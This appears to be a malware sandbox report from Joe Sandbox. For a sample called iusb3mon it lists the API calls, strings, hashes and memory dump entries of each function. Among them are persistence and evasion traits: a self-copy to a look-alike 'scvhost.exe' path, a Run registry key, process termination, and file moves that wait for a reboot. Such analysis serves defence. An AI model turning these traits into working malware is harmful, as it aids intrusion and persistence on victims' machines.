Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID:
API String ID: 1651298574-0
Opcode ID: b4114ec6dbde01ab8fb4f8ddf0a2ce6877e2166426422137792157409558643e
Instruction ID: 49c64424e755023ca34aaaa375bcce62638686967dd53e26761466fdf019f88b
Opcode Fuzzy Hash: b4114ec6dbde01ab8fb4f8ddf0a2ce6877e2166426422137792157409558643e
Instruction Fuzzy Hash: FA71AE32A00249EFDF21AF94DC44ABE7FBAFB05B14F04402DFD59A6260D736A851DB90

Function 04D7E461 Relevance: 13.7, APIs: 9, Instructions: 177COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,04D8E7F0,00000001,00000000,00000000,7591E860,04DA893C,?,00000003,00000000,00000001,00000000,?,?,04D83769), ref: 04D7E4A3
LCMapStringA.KERNEL32(00000000,00000100,04DA6150,00000001,00000000,00000000,?,?,04D83769,?), ref: 04D7E4BF
LCMapStringA.KERNEL32(?,?,00000000,00000001,00000000,00000003,7591E860,04DA893C,?,00000003,00000000,00000001,00000000,?,?,04D83769), ref: 04D7E508
MultiByteToWideChar.KERNEL32(?,04DA893D,00000000,00000001,00000000,00000000,7591E860,04DA893C,?,00000003,00000000,00000001,00000000,?,?,04D83769), ref: 04D7E540
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,?,00000000), ref: 04D7E598
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 04D7E5AE
LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 04D7E5E1
LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 04D7E649

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 0b8d60b94a7c1a4e65d0dc2ef5dd7e3cbeec20b07cff9314d9c9e02f07d17086
Instruction ID: 1bd00c22310a74dffc507498fb280e18633233b21b5999a7305f7aeda5a6e7ef
Opcode Fuzzy Hash: 0b8d60b94a7c1a4e65d0dc2ef5dd7e3cbeec20b07cff9314d9c9e02f07d17086
Instruction Fuzzy Hash: EF518931A00219EFDF228F94CC49AAEBFB9FB48754F104559F910A2250F736A920DFA1

Function 00572DE0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00572E36
std::_Lockit::_Lockit.LIBCPMT ref: 00572E58
std::_Lockit::~_Lockit.LIBCPMT ref: 00572E78
std::_Facet_Register.LIBCPMT ref: 00572EE5
std::_Lockit::~_Lockit.LIBCPMT ref: 00572F01
Concurrency::cancel_current_task.LIBCPMT ref: 00572F61

Strings

Xx, xrefs: 00572E3F, 00572EF4

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID: Xx
API String ID: 2081738530-351867327
Opcode ID: 2f3cf7d123000b63df018b4106a3dbbe76dab1e25ae6122a0710cc804ca11cf8
Instruction ID: dee606215c4f4b14fcd617eab1c6c07594e252179e44ec72e119682f6e1d8dd4
Opcode Fuzzy Hash: 2f3cf7d123000b63df018b4106a3dbbe76dab1e25ae6122a0710cc804ca11cf8
Instruction Fuzzy Hash: 39518371A00215CFCB11DF58E449BADBBF4FF48720F15815AE859AB351DB30AE05EBA1

Function 04D780C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?,?,?,?,04D77EA3), ref: 04D780EA
GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 04D780F9
LoadLibraryA.KERNEL32(?,?,?,?,04D77EA3), ref: 04D78130
GetProcAddress.KERNEL32(?,7459C083), ref: 04D781A7
FreeLibrary.KERNEL32(?,04D77EA3), ref: 04D781E9

Strings

kernel32.dll, xrefs: 04D780D5
IsBadReadPtr, xrefs: 04D780F0

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressLoadProc$Free
String ID: IsBadReadPtr$kernel32.dll
API String ID: 1413238409-2271619998
Opcode ID: 5835274699e08afa63356745ab638bc899d7478ff919aea96b736dc7508a7003
Instruction ID: e6a9271e5ca6fa0b0a333d1a87efcc40741cc0acb5fa5bcc0e766ddd018368de
Opcode Fuzzy Hash: 5835274699e08afa63356745ab638bc899d7478ff919aea96b736dc7508a7003
Instruction Fuzzy Hash: 09410D71A00205EFEB10DF65D849BAABBF4FF44395F188069ED45EB251E734E940DBA0

Function 04D80993 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,04D78D56), ref: 04D80A00
GetStdHandle.KERNEL32(000000F4,04D8EAEC,00000000,00000000,00000000,04D78D56), ref: 04D80AD6
WriteFile.KERNEL32(00000000), ref: 04D80ADD

Strings

<program name unknown>, xrefs: 04D80A10
..., xrefs: 04D80A52
Microsoft Visual C++ Runtime Library, xrefs: 04D80AAC
Runtime Error!Program: , xrefs: 04D80A66

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: a03f0686df864545d4d401f2ae7b07756f4f8f45b133b9c94cdeec2971fe9799
Instruction ID: 643204763f2088821cde33ec93e24181b785d4b0a5f905b0f859e224782348a3
Opcode Fuzzy Hash: a03f0686df864545d4d401f2ae7b07756f4f8f45b133b9c94cdeec2971fe9799
Instruction Fuzzy Hash: 1231B272B00218AFEF21BB60CC49FBE77ACEB45744F15045AF245E6150E670FA888E62

Function 04D74574 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63registryfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,00000000,?,?), ref: 04D745A6
CopyFileA.KERNEL32(00000000,?,00000000), ref: 04D745D3
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?), ref: 04D745ED
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000104,?,?), ref: 04D74608
RegCloseKey.ADVAPI32(?,?,?), ref: 04D74611

Strings

C:\Program Files\Common Files\scvhost.exe, xrefs: 04D745AE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 04D745E3

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCopyModuleNameOpenValue
String ID: C:\Program Files\Common Files\scvhost.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
API String ID: 3295893203-1226825942
Opcode ID: 5d15cafc5376e7fffbfdc219849531bd5831833daaa76363c2dd1f9ed7e2b835
Instruction ID: f30142a4ee3a6936537ced8f892856cc60745126e8bccd63822852472b9453da
Opcode Fuzzy Hash: 5d15cafc5376e7fffbfdc219849531bd5831833daaa76363c2dd1f9ed7e2b835
Instruction Fuzzy Hash: A1115E72A1021CBBEF119AA0DD49FEB7B7DEB05354F100466F605E6180D6B55E48CAA0

Function 04D7884F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 47libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D78854
LoadLibraryA.KERNEL32(ws2_32.dll), ref: 04D78873
GetProcAddress.KERNEL32(00000000,closesocket), ref: 04D78881
DeleteCriticalSection.KERNEL32(?), ref: 04D788B2
FreeLibrary.KERNEL32(00000000), ref: 04D788BD

Strings

closesocket, xrefs: 04D7887B
ws2_32.dll, xrefs: 04D7886E

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressCriticalDeleteFreeH_prologLoadProcSection
String ID: closesocket$ws2_32.dll
API String ID: 3065476401-181964208
Opcode ID: f641b45ac0f97d49e877469122f1439d0b0f82bb780867e2a635ae2968fd7507
Instruction ID: f5edaf18e6025328799792ac807c18dc17f45e205589cbe1166b2d1c6d69d6a1
Opcode Fuzzy Hash: f641b45ac0f97d49e877469122f1439d0b0f82bb780867e2a635ae2968fd7507
Instruction Fuzzy Hash: 03015671A00705DFEB10AFA8E84D67EB7F8FF44765F104A5AF412E2280E778A9048F61

Function 04D73D76 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 36fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,00000104,04D9CC34), ref: 04D73D93
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 04D73DA1
GetTickCount.KERNEL32 ref: 04D73DA7
wsprintfA.USER32 ref: 04D73DC1
MoveFileA.KERNEL32(?,?), ref: 04D73DD8
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 04D73DE9

Strings

%s\%d.bak, xrefs: 04D73DBB

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
String ID: %s\%d.bak
API String ID: 830686190-2116986511
Opcode ID: aece05574350dff7e8b33cece340e4c5ecaf756ca567c3d3cc393598c1b5a3ca
Instruction ID: 4817eed79f6da25aa407e8623c8efd26a6a108465b9f9bac39a569c5b65e2a00
Opcode Fuzzy Hash: aece05574350dff7e8b33cece340e4c5ecaf756ca567c3d3cc393598c1b5a3ca
Instruction Fuzzy Hash: CFF0F4B6D00218ABCB109BA4DD5DFC7B77DEB04311F000191B759D2154D7B89E98CFA4

Function 04D80828 Relevance: 12.1, APIs: 8, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,04D7B640), ref: 04D80843
GetEnvironmentStrings.KERNEL32(?,?,?,?,04D7B640), ref: 04D80857
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,04D7B640), ref: 04D80883
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,04D7B640), ref: 04D808BB
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,04D7B640), ref: 04D808DD
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,04D7B640), ref: 04D808F6
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,04D7B640), ref: 04D80909
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 04D80947

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: c3f1d58c792159a5d9c7b759e031a13c633d49249e1ce6d3b5cfa45523236809
Instruction ID: 2f38227fbf5cf6d795c3affa761d3927b55da9ef1cf3f49b17ad7bbb1300730f
Opcode Fuzzy Hash: c3f1d58c792159a5d9c7b759e031a13c633d49249e1ce6d3b5cfa45523236809
Instruction Fuzzy Hash: FA31DB726042595FEB227F755CC883F77ECF74A25471B052DF695C3200F621BC8986A1

Function 04D73441 Relevance: 12.1, APIs: 8, Instructions: 94processCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D73446
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04D7345C
Process32First.KERNEL32(00000000,?), ref: 04D73475
Process32Next.KERNEL32(00000000,00000128), ref: 04D73497
Process32Next.KERNEL32(00000000,00000128), ref: 04D734EF
OpenProcess.KERNEL32(00000001,00000000,?,?,00000000,00000128,00000000,?,00000002,00000000), ref: 04D734FF
TerminateProcess.KERNEL32(00000000,00000000), ref: 04D73509
CloseHandle.KERNEL32(00000000), ref: 04D73510

Part of subcall function 04D884B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 04D884C5

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process32$NextProcess$CloseCreateDecrementFirstH_prologHandleInterlockedOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 87439402-0
Opcode ID: 4a9958032df0ebf33e6549c99a4c380ff890a5f186464267541ca269b5c5143f
Instruction ID: 986c96a55a45f9aa5ecc63f5c8ee6410d150a6a5759430cb652875748cce469c
Opcode Fuzzy Hash: 4a9958032df0ebf33e6549c99a4c380ff890a5f186464267541ca269b5c5143f
Instruction Fuzzy Hash: CA316172A01119AEEB15FBA4CC90AFE7779FF05758F50005CF916A2190EB34AB45EA70

Function 04D8B68A Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 04D8B6AA
lstrcmpA.KERNEL32(?,?), ref: 04D8B6B6
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 04D8B6C8
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 04D8B6EB
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 04D8B6F3
GlobalLock.KERNEL32(00000000), ref: 04D8B700
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 04D8B70D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 04D8B72B

Part of subcall function 04D8B94C: GlobalFlags.KERNEL32(?), ref: 04D8B956
Part of subcall function 04D8B94C: GlobalUnlock.KERNEL32(?), ref: 04D8B96D
Part of subcall function 04D8B94C: GlobalFree.KERNEL32(?), ref: 04D8B978

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: dfe6a3d61bd99ebc0ea14a5cbe99b9de0139ccd0ff21f7fed2dea9b54d71066d
Instruction ID: d6131119dfd5de56a33055e353fd9a40f11379b08b345dc00cc2f31ad79cdcf4
Opcode Fuzzy Hash: dfe6a3d61bd99ebc0ea14a5cbe99b9de0139ccd0ff21f7fed2dea9b54d71066d
Instruction Fuzzy Hash: 12115E71200204BAEB217BB5CD49EBF7ABEEF85B44F50041EF609C5121D635B9519B30

Function 04D81FA5 Relevance: 10.7, APIs: 7, Instructions: 186processsynchronizationCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(04D7E9E9,04D7E9E9,00000000,00000000,00000001,000000FF,04D8E590,00000000,?,?,00000000,00000000,04D9EE8C), ref: 04D8210C
GetLastError.KERNEL32 ref: 04D82114
WaitForSingleObject.KERNEL32(?,000000FF), ref: 04D82151
GetExitCodeProcess.KERNEL32(?,?), ref: 04D8215E
CloseHandle.KERNEL32(?), ref: 04D82167
CloseHandle.KERNEL32(?), ref: 04D82174
CloseHandle.KERNEL32(04D7EA45), ref: 04D82184

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseHandle$Process$CodeCreateErrorExitLastObjectSingleWait
String ID:
API String ID: 966596688-0
Opcode ID: ebf29491003f13afb145172f5f6363932b214d957abed50fde2803b6b929b24b
Instruction ID: 5ec42d292ce0e7cf8f8f6c26b031352040768da5b972311c0a42327b91a02004
Opcode Fuzzy Hash: ebf29491003f13afb145172f5f6363932b214d957abed50fde2803b6b929b24b
Instruction Fuzzy Hash: 9A614671E00209AFDB22AFA8CC44AFDBBB5FF45314F10819EE561AB291D775B845CB60

Function 00571B50 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00571BD3
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00571C1F
__Getctype.LIBCPMT ref: 00571C38
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00571C54
std::_Lockit::~_Lockit.LIBCPMT ref: 00571CE9

Strings

bad locale name, xrefs: 00571D07

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1840309910-1405518554
Opcode ID: 3b5cf4389875a36daaf68bbe70771f7ede1a4c99cb02a2d4ae365d9b722124e3
Instruction ID: 491617260ba58e8cbf35980a319b23b04d0fc0b0ccf90d1da3a10a1cbae3133c
Opcode Fuzzy Hash: 3b5cf4389875a36daaf68bbe70771f7ede1a4c99cb02a2d4ae365d9b722124e3
Instruction Fuzzy Hash: FC51A1B1D006499BEF10DFE8E945B9EBFB8FF54710F148129E808A7241E775E908DB92

Function 04D741BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 98filestringCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,?,?), ref: 04D7420B
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 04D7422E
CloseHandle.KERNEL32(00000000,?,?), ref: 04D74240
wsprintfA.USER32 ref: 04D74271
lstrcpyA.KERNEL32(?,?,?,?), ref: 04D7428A

Part of subcall function 04D73FC8: wsprintfA.USER32 ref: 04D740AA

Strings

%s %s, xrefs: 04D7426B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseCreateHandleWritelstrcpy
String ID: %s %s
API String ID: 3555437440-2939940506
Opcode ID: 3ca5538c3604fe8e9b1ff3acf34a353cb18e9ed1024b60b12f0924aaca13c0d1
Instruction ID: a78d60befbc73a8b6c4aa68f3f55b0eff35b15b3cde2858843a6d52ffd93a16d
